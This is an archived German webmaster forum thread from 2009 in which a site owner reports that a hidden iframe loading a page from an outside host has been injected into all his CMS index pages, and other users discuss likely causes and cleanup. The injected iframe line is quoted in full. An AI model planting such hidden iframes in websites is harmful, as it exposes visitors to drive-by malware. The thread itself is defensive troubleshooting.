Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

scheisse gehackt!!

Forum rund um das Thema Hardware für Webmaster.
Neues Thema Antworten

 An Spam-Verantwortliche herankommen?

Welche URL ist SEO-optimal für separaten Bilderserver?

 
dominik1977
PostRank 1
PostRank 1
Beiträge: 9
Registriert: 18.06.2009, 19:39

Beitrag von dominik1977 » 09.07.2009, 17:18

Hallo,

sag mal ich habe auf jeder index seite auf meiner webseite
folgenden code <iframe src="https://u1l.ru:8080/index.php" width=124 height=197 style="visibility: hidden"></iframe>

da war jemand aktiv bei mir... habe einen debug an 1und1 gesendet da jemand von dort aus aktiv war. Aber ich weiss nicht was ich machen kann Passwoerter sind so geaendert 8 stellig das es eigentlich sicher ist.!

mhh was will der auf meiner seite ??? Und was kann ich nun noch tun...
Nach oben
Anzeige von ABAKUS

von Anzeige von ABAKUS »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.

Nach oben
smilla
PostRank 5
PostRank 5
Beiträge: 268
Registriert: 28.07.2008, 19:14

Beitrag von smilla » 09.07.2009, 17:23

Denke weniger das es an 1und1 liegt, sondern dass deine Script lücken haben, die Angreifer ausnutzen konnten.
Nach oben
mgutt
PostRank 10
PostRank 10
Beiträge: 3206
Registriert: 08.03.2005, 13:13

Beitrag von mgutt » 09.07.2009, 17:29

Scriptlücke oder Trojaner, der Dein FTP-Passwort geklaut hat.
Ich kaufe Dein Forum!
Kontaktdaten
Nach oben
philophax
PostRank 6
PostRank 6
Beiträge: 344
Registriert: 02.03.2005, 17:41
Wohnort: nahe Stuttgart 21

Beitrag von philophax » 09.07.2009, 17:32

CMS?
Hatten wir letztes Jahr durch eine Erweiterung im Typo3.
Die sind rein, haben das adminpassword ausgespäht, alle index.htm* mit diesem Müll vollgespammt und ein kleines Prog (oder was auch immer - nicht meine Baustelle) dagelassen, das die Änderungen im Passwordbereich verschickt hat.
Wir haben alles vom Netz genommen und einen neuen Server aufgesetzt :(
Nach oben
dominik1977
PostRank 1
PostRank 1
Beiträge: 9
Registriert: 18.06.2009, 19:39

Beitrag von dominik1977 » 09.07.2009, 17:42

ja cms...

wuerdet ihr nun das passwort aendern ich habe es schon letzte woche die sind trotzdem wieder rein .
Nach oben
philophax
PostRank 6
PostRank 6
Beiträge: 344
Registriert: 02.03.2005, 17:41
Wohnort: nahe Stuttgart 21

Beitrag von philophax » 09.07.2009, 17:44

https://www.abakus-internet-marketing.d ... tml#456597
Nach oben
ErwinRommel
PostRank 10
PostRank 10
Beiträge: 3868
Registriert: 14.09.2003, 20:46

Beitrag von ErwinRommel » 09.07.2009, 17:44

Dann liegt es vermutlich an einer Scriptlücke und hat nichts mit dem FTP-PW zu tun. Nutzt du die aktuellste Version deines CMS?
Social Media Beratung nicht nur für SEOs :)
<br>
<br>Onlineshops erfolgreich aufbauen
<br>
<br>Gute Links im Angebot.
Nach oben
dominik1977
PostRank 1
PostRank 1
Beiträge: 9
Registriert: 18.06.2009, 19:39

Beitrag von dominik1977 » 09.07.2009, 17:51

habe nun mal was in php.ini verändert mal schauen ob nun ruhe ist!!
so ein scheiss auf allen index seiten und das sind 1000 seiten .....
Nach oben
JohnBi
PostRank 10
PostRank 10
Beiträge: 2957
Registriert: 22.02.2009, 20:31

Beitrag von JohnBi » 09.07.2009, 17:55

Phase HTML Editor 5.0 - Dateiübergreifendes Suchen und Ersetzen, dann ist die Arbeit in genau 10 Sekunden erledigt ...
Probleme mit Google & Co.? Hier die Lösung! - Linktausch?! | Projekt kaufen?! |
-------------------------------------------
Der PostRank und das Anmeldedatum stehen in keinem Verhältnis zur Qualität der Antworten einiger User. {JohnBi, 2009}
Nach oben
dominik1977
PostRank 1
PostRank 1
Beiträge: 9
Registriert: 18.06.2009, 19:39

Beitrag von dominik1977 » 09.07.2009, 18:01

mmmhhh das habe ich auch! Wie kann ich das machen John Bi???
Nach oben
dominik1977
PostRank 1
PostRank 1
Beiträge: 9
Registriert: 18.06.2009, 19:39

Beitrag von dominik1977 » 09.07.2009, 18:10

kann man die dateien vom ftp server laden und dann den code via Dateiübergreifendes Suchen und Ersetzen entfernen?
Nach oben
e-fee
PostRank 10
PostRank 10
Beiträge: 3893
Registriert: 08.05.2007, 12:53

Beitrag von e-fee » 09.07.2009, 18:11

Nu ja, also wenn es ein CMS ist, dann liegen die Inhalte ja eh in einer Datenbank (da ist dann nix mehr mit Phase 5) - oder der Schadcode ist einer Datei des CMS quasi hardcodiert wie etwa ein Footer-Link, das ändert man dann genau EINmal.
Nach oben
JohnBi
PostRank 10
PostRank 10
Beiträge: 2957
Registriert: 22.02.2009, 20:31

Beitrag von JohnBi » 09.07.2009, 18:31

dominik1977 hat geschrieben:kann man die dateien vom ftp server laden und dann den code via Dateiübergreifendes Suchen und Ersetzen entfernen?
ganz genau
Probleme mit Google & Co.? Hier die Lösung! - Linktausch?! | Projekt kaufen?! |
-------------------------------------------
Der PostRank und das Anmeldedatum stehen in keinem Verhältnis zur Qualität der Antworten einiger User. {JohnBi, 2009}
Nach oben
3DCG
PostRank 7
PostRank 7
Beiträge: 550
Registriert: 22.01.2006, 20:11
Wohnort: FFM

Beitrag von 3DCG » 09.07.2009, 19:04

https://hosts-file.net/?s=77.37.19.173&view=matches


.
Nach oben
philophax
PostRank 6
PostRank 6
Beiträge: 344
Registriert: 02.03.2005, 17:41
Wohnort: nahe Stuttgart 21

Beitrag von philophax » 10.07.2009, 07:12

Bei uns damals waren das viele unterschiedliche Code-Schnipsel. Auch ca 1000 HTML-Seiten (einzeln von Hand ...) - und ein paar Typo3-Projekte. Da wars schlimmer, die haben wir auch einzeln und von Hand umgezogen. Neuer Server, alter Server vom Netz - und dann die Inhalte händisch neu eingepflegt. Dieser Müll-Code (iframe, php, javascript) steckte sogar in den Navigationpunkten vom Typo3 - und im Quelltext von .gifs - und natürlich in allen möglichen Datenbankinhalten.
Nach oben
Antworten

Zurück zu „Webmaster Hardware, Server, Hosting, Technik“

  • Vergleichbare Themen
    Antworten
    Zugriffe
    Letzter Beitrag